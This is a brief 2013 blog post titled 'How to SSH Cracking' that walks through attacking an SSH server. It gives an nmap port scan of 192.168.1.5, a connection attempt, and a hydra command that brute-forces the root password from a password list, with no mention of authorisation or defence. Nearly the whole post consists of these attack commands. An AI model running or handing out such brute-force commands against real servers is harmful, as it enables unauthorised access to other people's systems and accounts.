Thursday, April 4, 2013

How to SSH Cracking

We are going to use hydra to crack ssh.

  • Check if ssh port is open (default 22)
nmap -sT -Pn -n -p22 192.168.1.5
  • Try to connect
ssh 192.168.1.5
  • Cracking
hydra -l root -P mypasslist.lst 192.168.1.5 ssh
  • If step 3 ended succesfully, try to connect again

8 comments: